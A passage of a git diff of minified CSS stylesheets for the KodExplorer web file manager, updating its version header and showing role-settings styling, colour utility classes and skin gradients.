input[type='password']:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}body .group-role-setting .form-row .setting-title{float:left;width:70px;height:30px;padding-top:5px;}body .group-role-setting .form-row .setting-content{position:relative;}body .group-role-setting .form-row .dropdown-menu{left:70px;right:auto;margin-top:5px;}body .group-role-setting .form-row .dropdown-menu:before{right:auto;left:9px;}body .group-role-setting .form-row .dropdown-menu:after{right:auto;left:10px;}body .group-role-setting .form-row .item.item-main{background:rgba(0,0,0,0.05);border-radius:4px;height:25px;line-height:25px;}body .group-role-setting .form-row .group-role-check{background:#f4fbff;border:1px solid #c3e1ff;top:5px;padding:5px;margin-left:70px;border-radius:3px;}body .group-role-setting .form-row .group-role-check .item label{display:block;height:25px;line-height:25px;padding:0px 4px;margin:1px 0;position:relative;top:-5px;}body .group-role-setting .form-row .group-role-check .item label span,body .group-role-setting .form-row .group-role-check .item label i{position:relative;top:5px;}body .group-role-setting .form-row .group-role-check .item:hover{color:#2196F3;background:#def;border-radius:4px;}body .group-role-setting .form-row .group-role-check .content{margin-left:32px;margin-bottom:10px;}body .group-role-setting .form-row-submit{background:#eee;margin:10px 0 10px 0;border-top:1px solid #ddd;height:60px;width:100%;}body .group-role-setting .form-row-submit .setting-content{margin:10px;}body .group-role-setting .form-row-submit .btn{padding:4px 2em;margin-left:10px;}body .group-role-setting .form-row-submit .btn.btn-remove{float:right;color:#666;background:none;}body .group-role-setting .form-row-submit .save{width:60px;}body .group-role-setting .left-content{position:absolute;bottom:0px;top:0px;overflow:auto;width:160px;padding:10px;border-right:1px solid #ddd;}body .group-role-setting .left-content .role-cell{color:#444;display:block;text-decoration:none;border-radius:3px;height:30px;line-height:30px;padding-left:20px;margin-bottom:3px;cursor:pointer;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}body .group-role-setting .left-content .role-cell.role-cell-add{text-align:center;background:#eee;padding:0;color:#666;}body .group-role-setting .left-content .role-cell:hover{background:#eee;}body .group-role-setting .left-content .role-cell.select,body .group-role-setting .left-content .role-cell.select.role-cell-add{background:#63acff;color:#fff;}body .group-role-setting .left-content .role-cell .sub-menu{float:right;line-height:30px;height:30px;width:30px;text-align:center;}body .group-role-setting .right-content{position:absolute;bottom:0px;top:0px;left:180px;right:0px;overflow:auto;} +/* ver 4.06(2017-08-30) [build 1504100995.1393] */ \ No newline at end of file diff --git a/static/style/skin/diy.css b/static/style/skin/diy.css index 27b9152..359b89e 100755 --- a/static/style/skin/diy.css +++ b/static/style/skin/diy.css @@ -1,3 +1,3 @@ -/* power by kodexplorer ver 4.05(2017-08-26) [build 1503738071.981] */ +/* power by kodexplorer ver 4.06(2017-08-30) [build 1504100996.8531] */ body{font-size:12px;padding:0px;margin:0px;font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}textarea,input,button,pre,p,.can-select{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;}blockquote{padding:10px 20px;margin:0 0 20px 1em;border-left:10px solid #eee;background:#f6f6f6;}blockquote p{font-size:1em;margin:0px;}a{text-decoration:none;}a:focus{outline:none !important;}h1,h2,h3,h4,h5,.h1,.h2,.h3,.h4,.h5{font-family:"Helvetica Neue", "Helvetica", "Microsoft Yahei", "微软雅黑", "Lantinghei SC", "STXihei", "WenQuanYi Micro Hei", Arial, sans-serif;-webkit-font-smoothing:antialiased;}*,*:before,*:after{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}label{font-weight:normal;}pre{border:none;border-radius:0;}::-webkit-scrollbar-track-piece{background-color:rgba(180,180,180,0.06);border-radius:3px;}::-webkit-scrollbar{width:10px;height:10px;}::-webkit-scrollbar-thumb{background-color:rgba(180,180,180,0.2);border-radius:12px;background-clip:padding-box;border:1px solid rgba(180,180,180,0.4);min-height:28px;}::-webkit-scrollbar-thumb:hover{background-color:rgba(180,180,180,0.4);border:1px solid rgba(180,180,180,0.7);}.can-select,.can-select *{-khtml-user-select:text !important;-webkit-user-select:text !important;-moz-user-select:text !important;-ms-user-select:text !important;-o-user-select:text !important;user-select:text !important;}.can-not-select,.can-not-select *{-khtml-user-select:none !important;-webkit-user-select:none !important;-moz-user-select:none !important;-ms-user-select:none !important;-o-user-select:none !important;user-select:none !important;}.fl{float:left;}.fl-left{float:left;}.fl-right{float:right;}.disable,.disabled{cursor:not-allowed;pointer-events:none;}.clear{clear:both;}.hidden{display:none;}.FontAwesome{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;}.font-nomal{font-weight:800;}.font-bold,.bold{font-weight:800;}.font-400{font-weight:400;}.font-800{font-weight:800;}.size12{font-size:12px;}.size14{font-size:14px;}.size16{font-size:16px;}.size18{font-size:18px;}.size20{font-size:20px;}.size22{font-size:22px;}.align-left{text-align:left;}.align-center{text-align:center;}.align-right{text-align:right;}.p-5{padding:5px;}.p-10{padding:10px;}.p-15{padding:15px;}.p-20{padding:20px;}.p-25{padding:25px;}.p-30{padding:30px;}.p-35{padding:35px;}.p-40{padding:40px;}.p-45{padding:45px;}.p-50{padding:50px;}.pt-5{padding-top:5px;}.pr-5{padding-right:5px;}.pb-5{padding-bottom:5px;}.pl-5{padding-left:5px;}.pt-10{padding-top:10px;}.pr-10{padding-right:10px;}.pb-10{padding-bottom:10px;}.pl-10{padding-left:10px;}.pt-15{padding-top:15px;}.pr-15{padding-right:15px;}.pb-15{padding-bottom:15px;}.pl-15{padding-left:15px;}.pt-20{padding-top:20px;}.pr-20{padding-right:20px;}.pb-20{padding-bottom:20px;}.pl-20{padding-left:20px;}.pt-25{padding-top:25px;}.pr-25{padding-right:25px;}.pb-25{padding-bottom:25px;}.pl-25{padding-left:25px;}.pt-30{padding-top:30px;}.pr-30{padding-right:30px;}.pb-30{padding-bottom:30px;}.pl-30{padding-left:30px;}.pt-35{padding-top:35px;}.pr-35{padding-right:35px;}.pb-35{padding-bottom:35px;}.pl-35{padding-left:35px;}.pt-40{padding-top:40px;}.pr-40{padding-right:40px;}.pb-40{padding-bottom:40px;}.pl-40{padding-left:40px;}.pt-45{padding-top:45px;}.pr-45{padding-right:45px;}.pb-45{padding-bottom:45px;}.pl-45{padding-left:45px;}.pt-50{padding-top:50px;}.pr-50{padding-right:50px;}.pb-50{padding-bottom:50px;}.pl-50{padding-left:50px;}.m-5{margin:5px;}.m-10{margin:10px;}.m-15{margin:15px;}.m-20{margin:20px;}.m-25{margin:25px;}.m-30{margin:30px;}.m-35{margin:35px;}.m-40{margin:40px;}.m-45{margin:45px;}.m-50{margin:50px;}.mt-5{margin-top:5px;}.mr-5{margin-right:5px;}.mb-5{margin-bottom:5px;}.ml-5{margin-left:5px;}.mt-10{margin-top:10px;}.mr-10{margin-right:10px;}.mb-10{margin-bottom:10px;}.ml-10{margin-left:10px;}.mt-15{margin-top:15px;}.mr-15{margin-right:15px;}.mb-15{margin-bottom:15px;}.ml-15{margin-left:15px;}.mt-20{margin-top:20px;}.mr-20{margin-right:20px;}.mb-20{margin-bottom:20px;}.ml-20{margin-left:20px;}.mt-25{margin-top:25px;}.mr-25{margin-right:25px;}.mb-25{margin-bottom:25px;}.ml-25{margin-left:25px;}.mt-30{margin-top:30px;}.mr-30{margin-right:30px;}.mb-30{margin-bottom:30px;}.ml-30{margin-left:30px;}.mt-35{margin-top:35px;}.mr-35{margin-right:35px;}.mb-35{margin-bottom:35px;}.ml-35{margin-left:35px;}.mt-40{margin-top:40px;}.mr-40{margin-right:40px;}.mb-40{margin-bottom:40px;}.ml-40{margin-left:40px;}.mt-45{margin-top:45px;}.mr-45{margin-right:45px;}.mb-45{margin-bottom:45px;}.ml-45{margin-left:45px;}.mt-50{margin-top:50px;}.mr-50{margin-right:50px;}.mb-50{margin-bottom:50px;}.ml-50{margin-left:50px;}.blue-1{color:#ecf6fd;}.bg-blue-1{background:#ecf6fd;}.bdcolor-blue-1{border-color:#ecf6fd;}.blue-2{color:#d2eafb;}.bg-blue-2{background:#d2eafb;}.bdcolor-blue-2{border-color:#d2eafb;}.blue-3{color:#add8f7;}.bg-blue-3{background:#add8f7;}.bdcolor-blue-3{border-color:#add8f7;}.blue-4{color:#7ec2f3;}.bg-blue-4{background:#7ec2f3;}.bdcolor-blue-4{border-color:#7ec2f3;}.blue-5{color:#49a9ee;}.bg-blue-5{background:#49a9ee;}.bdcolor-blue-5{border-color:#49a9ee;}.blue-6{color:#108ee9;}.bg-blue-6{background:#108ee9;}.bdcolor-blue-6{border-color:#108ee9;}.blue-7{color:#0e77ca;}.bg-blue-7{background:#0e77ca;}.bdcolor-blue-7{border-color:#0e77ca;}.blue-8{color:#0c60aa;}.bg-blue-8{background:#0c60aa;}.bdcolor-blue-8{border-color:#0c60aa;}.blue-9{color:#09488a;}.bg-blue-9{background:#09488a;}.bdcolor-blue-9{border-color:#09488a;}.blue-10{color:#073069;}.bg-blue-10{background:#073069;}.bdcolor-blue-10{border-color:#073069;}.purple-1{color:#f4f3fd;}.bg-purple-1{background:#f4f3fd;}.bdcolor-purple-1{border-color:#f4f3fd;}.purple-2{color:#e4e2fa;}.bg-purple-2{background:#e4e2fa;}.bdcolor-purple-2{border-color:#e4e2fa;}.purple-3{color:#cfcaf6;}.bg-purple-3{background:#cfcaf6;}.bdcolor-purple-3{border-color:#cfcaf6;}.purple-4{color:#b3acf2;}.bg-purple-4{background:#b3acf2;}.bdcolor-purple-4{border-color:#b3acf2;}.purple-5{color:#948aec;}.bg-purple-5{background:#948aec;}.bdcolor-purple-5{border-color:#948aec;}.purple-6{color:#7265e6;}.bg-purple-6{background:#7265e6;}.bdcolor-purple-6{border-color:#7265e6;}.purple-7{color:#6252cd;}.bg-purple-7{background:#6252cd;}.bdcolor-purple-7{border-color:#6252cd;}.purple-8{color:#533eb4;}.bg-purple-8{background:#533eb4;}.bdcolor-purple-8{border-color:#533eb4;}.purple-9{color:#42299a;}.bg-purple-9{background:#42299a;}.bdcolor-purple-9{border-color:#42299a;}.purple-10{color:#321580;}.bg-purple-10{background:#321580;}.bdcolor-purple-10{border-color:#321580;}.cyan-1{color:#ebf8f9;}.bg-cyan-1{background:#ebf8f9;}.bdcolor-cyan-1{border-color:#ebf8f9;}.cyan-2{color:#cfedf0;}.bg-cyan-2{background:#cfedf0;}.bdcolor-cyan-2{border-color:#cfedf0;}.cyan-3{color:#a7dfe3;}.bg-cyan-3{background:#a7dfe3;}.bdcolor-cyan-3{border-color:#a7dfe3;}.cyan-4{color:#76cdd3;}.bg-cyan-4{background:#76cdd3;}.bdcolor-cyan-4{border-color:#76cdd3;}.cyan-5{color:#3db8c1;}.bg-cyan-5{background:#3db8c1;}.bdcolor-cyan-5{border-color:#3db8c1;}.cyan-6{color:#00a2ae;}.bg-cyan-6{background:#00a2ae;}.bdcolor-cyan-6{border-color:#00a2ae;}.cyan-7{color:#008997;}.bg-cyan-7{background:#008997;}.bdcolor-cyan-7{border-color:#008997;}.cyan-8{color:#00707f;}.bg-cyan-8{background:#00707f;}.bdcolor-cyan-8{border-color:#00707f;}.cyan-9{color:#005667;}.bg-cyan-9{background:#005667;}.bdcolor-cyan-9{border-color:#005667;}.cyan-10{color:#003c4e;}.bg-cyan-10{background:#003c4e;}.bdcolor-cyan-10{border-color:#003c4e;}.green-1{color:#ebf8f2;}.bg-green-1{background:#ebf8f2;}.bdcolor-green-1{border-color:#ebf8f2;}.green-2{color:#cfefdf;}.bg-green-2{background:#cfefdf;}.bdcolor-green-2{border-color:#cfefdf;}.green-3{color:#a7e1c4;}.bg-green-3{background:#a7e1c4;}.bdcolor-green-3{border-color:#a7e1c4;}.green-4{color:#76d0a3;}.bg-green-4{background:#76d0a3;}.bdcolor-green-4{border-color:#76d0a3;}.green-5{color:#3dbd7d;}.bg-green-5{background:#3dbd7d;}.bdcolor-green-5{border-color:#3dbd7d;}.green-6{color:#00a854;}.bg-green-6{background:#00a854;}.bdcolor-green-6{border-color:#00a854;}.green-7{color:#00924c;}.bg-green-7{background:#00924c;}.bdcolor-green-7{border-color:#00924c;}.green-8{color:#007b43;}.bg-green-8{background:#007b43;}.bdcolor-green-8{border-color:#007b43;}.green-9{color:#00643b;}.bg-green-9{background:#00643b;}.bdcolor-green-9{border-color:#00643b;}.green-10{color:#004c32;}.bg-green-10{background:#004c32;}.bdcolor-green-10{border-color:#004c32;}.pink-1{color:#feeff5;}.bg-pink-1{background:#feeff5;}.bdcolor-pink-1{border-color:#feeff5;}.pink-2{color:#fdd8e7;}.bg-pink-2{background:#fdd8e7;}.bdcolor-pink-2{border-color:#fdd8e7;}.pink-3{color:#fcb8d3;}.bg-pink-3{background:#fcb8d3;}.bdcolor-pink-3{border-color:#fcb8d3;}.pink-4{color:#fa90ba;}.bg-pink-4{background:#fa90ba;}.bdcolor-pink-4{border-color:#fa90ba;}.pink-5{color:#f7629e;}.bg-pink-5{background:#f7629e;}.bdcolor-pink-5{border-color:#f7629e;}.pink-6{color:#f5317f;}.bg-pink-6{background:#f5317f;}.bdcolor-pink-6{border-color:#f5317f;}.pink-7{color:#dc277d;}.bg-pink-7{background:#dc277d;}.bdcolor-pink-7{border-color:#dc277d;}.pink-8{color:#c11c7b;}.bg-pink-8{background:#c11c7b;}.bdcolor-pink-8{border-color:#c11c7b;}.pink-9{color:#a71278;}.bg-pink-9{background:#a71278;}.bdcolor-pink-9{border-color:#a71278;}.pink-10{color:#8c0776;}.bg-pink-10{background:#8c0776;}.bdcolor-pink-10{border-color:#8c0776;}.red-1{color:#fef0ef;}.bg-red-1{background:#fef0ef;}.bdcolor-red-1{border-color:#fef0ef;}.red-2{color:#fcdbd9;}.bg-red-2{background:#fcdbd9;}.bdcolor-red-2{border-color:#fcdbd9;}.red-3{color:#fabeb9;}.bg-red-3{background:#fabeb9;}.bdcolor-red-3{border-color:#fabeb9;}.red-4{color:#f79992;}.bg-red-4{background:#f79992;}.bdcolor-red-4{border-color:#f79992;}.red-5{color:#f46e65;}.bg-red-5{background:#f46e65;}.bdcolor-red-5{border-color:#f46e65;}.red-6{color:#f04134;}.bg-red-6{background:#f04134;}.bdcolor-red-6{border-color:#f04134;}.red-7{color:#d73435;}.bg-red-7{background:#d73435;}.bdcolor-red-7{border-color:#d73435;}.red-8{color:#bd2636;}.bg-red-8{background:#bd2636;}.bdcolor-red-8{border-color:#bd2636;}.red-9{color:#a31837;}.bg-red-9{background:#a31837;}.bdcolor-red-9{border-color:#a31837;}.red-10{color:#880a38;}.bg-red-10{background:#880a38;}.bdcolor-red-10{border-color:#880a38;}.orange-1{color:#fef3eb;}.bg-orange-1{background:#fef3eb;}.bdcolor-orange-1{border-color:#fef3eb;}.orange-2{color:#fde3cf;}.bg-orange-2{background:#fde3cf;}.bdcolor-orange-2{border-color:#fde3cf;}.orange-3{color:#fccca7;}.bg-orange-3{background:#fccca7;}.bdcolor-orange-3{border-color:#fccca7;}.orange-4{color:#faaf76;}.bg-orange-4{background:#faaf76;}.bdcolor-orange-4{border-color:#faaf76;}.orange-5{color:#f78e3d;}.bg-orange-5{background:#f78e3d;}.bdcolor-orange-5{border-color:#f78e3d;}.orange-6{color:#f56a00;}.bg-orange-6{background:#f56a00;}.bdcolor-orange-6{border-color:#f56a00;}.orange-7{color:#d75000;}.bg-orange-7{background:#d75000;}.bdcolor-orange-7{border-color:#d75000;}.orange-8{color:#b93600;}.bg-orange-8{background:#b93600;}.bdcolor-orange-8{border-color:#b93600;}.orange-9{color:#991b00;}.bg-orange-9{background:#991b00;}.bdcolor-orange-9{border-color:#991b00;}.orange-10{color:#7a0000;}.bg-orange-10{background:#7a0000;}.bdcolor-orange-10{border-color:#7a0000;}.yellow-1{color:#fffaeb;}.bg-yellow-1{background:#fffaeb;}.bdcolor-yellow-1{border-color:#fffaeb;}.yellow-2{color:#fff3cf;}.bg-yellow-2{background:#fff3cf;}.bdcolor-yellow-2{border-color:#fff3cf;}.yellow-3{color:#ffe9a7;}.bg-yellow-3{background:#ffe9a7;}.bdcolor-yellow-3{border-color:#ffe9a7;}.yellow-4{color:#ffdd76;}.bg-yellow-4{background:#ffdd76;}.bdcolor-yellow-4{border-color:#ffdd76;}.yellow-5{color:#ffce3d;}.bg-yellow-5{background:#ffce3d;}.bdcolor-yellow-5{border-color:#ffce3d;}.yellow-6{color:#ffbf00;}.bg-yellow-6{background:#ffbf00;}.bdcolor-yellow-6{border-color:#ffbf00;}.yellow-7{color:#e09a00;}.bg-yellow-7{background:#e09a00;}.bdcolor-yellow-7{border-color:#e09a00;}.yellow-8{color:#c17500;}.bg-yellow-8{background:#c17500;}.bdcolor-yellow-8{border-color:#c17500;}.yellow-9{color:#a04f00;}.bg-yellow-9{background:#a04f00;}.bdcolor-yellow-9{border-color:#a04f00;}.yellow-10{color:#802800;}.bg-yellow-10{background:#802800;}.bdcolor-yellow-10{border-color:#802800;}.grey-1{color:#fbfbfb;}.bg-grey-1{background:#fbfbfb;}.bdcolor-grey-1{border-color:#fbfbfb;}.grey-2{color:#f7f7f7;}.bg-grey-2{background:#f7f7f7;}.bdcolor-grey-2{border-color:#f7f7f7;}.grey-3{color:#f5f5f5;}.bg-grey-3{background:#f5f5f5;}.bdcolor-grey-3{border-color:#f5f5f5;}.grey-4{color:#e9e9e9;}.bg-grey-4{background:#e9e9e9;}.bdcolor-grey-4{border-color:#e9e9e9;}.grey-5{color:#d9d9d9;}.bg-grey-5{background:#d9d9d9;}.bdcolor-grey-5{border-color:#d9d9d9;}.grey-6{color:#bfbfbf;}.bg-grey-6{background:#bfbfbf;}.bdcolor-grey-6{border-color:#bfbfbf;}.grey-7{color:#919191;}.bg-grey-7{background:#919191;}.bdcolor-grey-7{border-color:#919191;}.grey-8{color:#5a5a5a;}.bg-grey-8{background:#5a5a5a;}.bdcolor-grey-8{border-color:#5a5a5a;}.grey-9{color:#404040;}.bg-grey-9{background:#404040;}.bdcolor-grey-9{border-color:#404040;}.grey-10{color:#222;}.bg-grey-10{background:#222;}.bdcolor-grey-10{border-color:#222;}.translation-fast{-webkit-transition:all 0.168s ease-in-out;-moz-transition:all 0.168s ease-in-out;-o-transition:all 0.168s ease-in-out;-ms-transition:all 0.168s ease-in-out;transition:all 0.168s ease-in-out;}.translation-nomal{-webkit-transition:all 0.25s ease-in-out;-moz-transition:all 0.25s ease-in-out;-o-transition:all 0.25s ease-in-out;-ms-transition:all 0.25s ease-in-out;transition:all 0.25s ease-in-out;}.translation-slow{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-200{-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;}.translation-300{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;-ms-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;}.translation-500{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-1000{-webkit-transition:all 1.0s ease-in-out;-moz-transition:all 1.0s ease-in-out;-o-transition:all 1.0s ease-in-out;-ms-transition:all 1.0s ease-in-out;transition:all 1.0s ease-in-out;}.label{font-weight:400;font-size:1em;display:inline-block;}.label.label-blue-deep{background:#1b63ab;color:#fff;}.label.label-blue-nomal{background:#39f;color:#fff;}.label.label-blue-light{background:#d4e9ff;color:#39f;}.label.label-grey-deep{background:#464c5b;color:#fff;}.label.label-grey-nomal{background:#657180;color:#fff;}.label.label-grey-light{background:#9ea7b4;color:#fff;}.label.label-yellow-deep{background:#ff9900;color:#fff;}.label.label-yellow-nomal{background:#ffc267;color:#fff;}.label.label-yellow-light{background:#ffe2b6;color:#ff9900;}.label.label-green-deep{background:#068c49;color:#fff;}.label.label-green-nomal{background:#00cc66;color:#fff;}.label.label-green-light{background:#beffde;color:#068c49;}.cursor-mouse.cursor-default *{cursor:url("../../../images/common/cursor/default.png"), auto !important;}.cursor-mouse.cursor-move *{cursor:url("../../../images/common/cursor/move.png"), auto !important;}.cursor-mouse.cursor-down *{cursor:url("../../../images/common/cursor/down.png"), auto !important;}.cursor-mouse.cursor-add *{cursor:url("../../../images/common/cursor/add.png"), auto !important;}.text-color-set{color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;}@media screen and (max-width:100000px){body{ position:absolute;top:0px;left:0px;bottom:0px;right:0px;} body .x-folder{ background-image:url("../../images/file_icon/icon_others/folder_alpha.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_alpha.png',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_alpha.png',sizingMethod='scale');} body .full-background{ position:absolute;top:0px;left:0px;bottom:0px;right:0px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#480552', endColorstr='#000000');background-image:-webkit-linear-gradient(180deg,#480552,#000000);background-image:-moz-linear-gradient(180deg,#480552,#000000);background-image:-o-linear-gradient(180deg,#480552,#000000);background-image:-ms-linear-gradient(180deg,#480552,#000000);background-image:linear-gradient(180deg,#480552,#000000);-pie-background:linear-gradient(to 180deg,#480552,#000000);background-size:100% 100%;} body .full-background:before{ width:100%;height:100%;display:block;content:" ";filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#480552', endColorstr='#000000');background-image:-webkit-linear-gradient(180deg,#480552,#000000);background-image:-moz-linear-gradient(180deg,#480552,#000000);background-image:-o-linear-gradient(180deg,#480552,#000000);background-image:-ms-linear-gradient(180deg,#480552,#000000);background-image:linear-gradient(180deg,#480552,#000000);-pie-background:linear-gradient(to 180deg,#480552,#000000);background-size:100% 100%;filter:url(blur.svg#full-background);-webkit-filter:blur(10px);-moz-filter:blur(10px);-ms-filter:blur(10px);filter:blur(10px);} body .btn .font-icon, body .btn.btn-default .font-icon{ color:rgba(255,255,255,0.8);} body .aui-outer .btn .font-icon, body .edit-main .btn .font-icon{ color:#999;} body .common-footer{ background:rgba(234,234,234,0.1);color:rgba(255,255,255,0.6);border-top:1px solid rgba(234,234,234,0.15);} body .common-footer a{ color:rgba(255,255,255,0.8);} body .context-menu-list{ box-shadow:0 10px 40px rgba(0,0,0,0.4);border-radius:0;background:rgba(255,255,255,0.95);} body .context-menu-list .context-menu-item{ line-height:25px;height:25px;padding:0 15px 0 20px;} body .aui-outer{ *border:1px solid #ccc;border:1px solid #ccc \0/IE9;box-shadow:0px 5px 20px rgba(0,0,0,0.5), 0 0 0 1px rgba(255,255,255,0.2);} body .aui-state-focus .aui-outer{ box-shadow:0px 5px 30px rgba(0,0,0,0.7), 0 0 0 1px rgba(255,255,255,0.2);} body .aui-buttons{ border-top:1px solid rgba(255,255,255,0.2);} body div.dialog-simple .aui-title{ border-radius:0;} body .aui-buttons button.aui-state-highlight{ background:linear-gradient(to right,#44abf6,#2865e2);} body .aui-state-focus .aui-title, body .aui-title{ background-color:rgba(0,0,0,0.8);box-shadow:0 1px 0 rgba(255,255,255,0.15);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#480552', endColorstr='#000000');background-image:-webkit-linear-gradient(200deg,#480552,#000000);background-image:-moz-linear-gradient(200deg,#480552,#000000);background-image:-o-linear-gradient(200deg,#480552,#000000);background-image:-ms-linear-gradient(200deg,#480552,#000000);background-image:linear-gradient(200deg,#480552,#000000);-pie-background:linear-gradient(to 200deg,#480552,#000000);text-shadow:0px 0px 0px #fff, 0px 0px 4px #000, 0px 0px 5px #000;opacity:0.95;} body .dropdown-menu > li > a:hover, body .dropdown-menu .this a, body .dropdown-menu > li > a:focus{ background:linear-gradient(to right,#44abf6,#2865e2);} body .topbar{ background:rgba(234,234,234,0.23);box-shadow:0 0 6px rgba(0,0,0,0.2);border-bottom:1px solid rgba(255,255,255,0.01);border:none;} body .topbar .content{ border-bottom:none;} body .topbar .content .topbar-menu{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;border-color:rgba(234,234,234,0.05);} body .topbar .content .open .topbar-menu, body .topbar .content .topbar-menu:hover, body .topbar .content .topbar-menu.this{ background:rgba(234,234,234,0.23);} body .topbar .content .share-title, body .topbar .content .share-info, body .topbar .content .share-info .time{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .topbar .content .top-right div.share-info-user{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .frame-main{ background:rgba(221,221,221,0.02);} body .frame-main .frame-right .frame-right-main .tools{ background:rgba(221,221,221,0.02);border-bottom:1px solid rgba(234,234,234,0.15);box-shadow:1px 2px 15px rgba(0,0,0,0.2);} body .frame-main .frame-right .frame-right-main .tools .font-icon{ color:#fff;} body .frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size:hover .dropdown-toggle, body .frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size.open .dropdown-toggle{ background:rgba(234,234,234,0.23);color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size .set-icon-size-slider .slider-bg{ background:#666;} body .frame-main .frame-right .file-select-info{ background:#000;background:rgba(0,0,0,0.2);color:#aaa;opacity:0.5;filter:alpha(opacity=50);} body div.frame-header{ background:rgba(221,221,221,0.02);border-bottom:1px solid rgba(234,234,234,0.05);} body div.frame-main .frame-left{ background:rgba(221,221,221,0.02);border-right:1px solid rgba(234,234,234,0.15);} body div.frame-main .frame-left .bottom-box{ background:rgba(221,221,221,0.02);border-right:none;border-top:1px solid rgba(234,234,234,0.15);} body div.frame-main .frame-left .bottom-box .cell{ background:rgba(221,221,221,0.02);color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;border:1px solid rgba(234,234,234,0.05);box-shadow:0 0 10px rgba(0,0,0,0.1);} body div.frame-main .frame-left .bottom-box .cell:hover{ background:rgba(234,234,234,0.16);} body .user-space-info{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .group-space-use{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.15);} body .btn-default{ text-shadow:none;} body #btn-history-back, body #home, body #fav{ border-right-color:transparent;} body .btn#home{ border-radius:3px 0 0 3px;} body .btn#up, body .btn#search{ border-radius:0 3px 3px 0;} body .input-style{ background:none;border:1px solid rgba(234,234,234,0.23);border-right-color:transparent;box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .frame-header .header-content .header-right input, body .frame-header .header-content .header-right input:focus{ background:none;border:1px solid rgba(234,234,234,0.23);border-right-color:transparent;box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .frame-header .header-content .header-right input{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .button-style{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.23);box-shadow:0 5px 10px rgba(234,234,234,0.1) inset;} body .button-style:hover{ box-shadow:inset 0 2px 4px rgba(0,0,0,0.1), 0 0 5px rgba(234,234,234,0.15);border-color:rgba(234,234,234,0.15);} body .button-style:active, body .button-style.active{ box-shadow:inset 0 4px 10px rgba(0,0,0,0.4);border-color:rgba(234,234,234,0.23);} body .frame-main .frame-right .frame-right-main .tools button.btn, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn, body .frame-header .header-content button.btn, body .frame-header .header-content .header-right .btn-default, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.23);box-shadow:0 5px 10px rgba(234,234,234,0.1) inset;} body .frame-main .frame-right .frame-right-main .tools button.btn:hover, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn:hover, body .frame-header .header-content button.btn:hover, body .frame-header .header-content .header-right .btn-default:hover, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path:hover{ box-shadow:inset 0 2px 4px rgba(0,0,0,0.1), 0 0 5px rgba(234,234,234,0.15);border-color:rgba(234,234,234,0.15);} body .frame-main .frame-right .frame-right-main .tools button.btn:active, body .frame-main .frame-right .frame-right-main .tools button.btn.active, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn:active, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn.active, body .frame-header .header-content button.btn:active, body .frame-header .header-content button.btn.active, body .frame-header .header-content .header-right .btn-default:active, body .frame-header .header-content .header-right .btn-default.active, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path:active, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path.active{ box-shadow:inset 0 4px 10px rgba(0,0,0,0.4);border-color:rgba(234,234,234,0.23);} body .header-middle .btn-default{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px 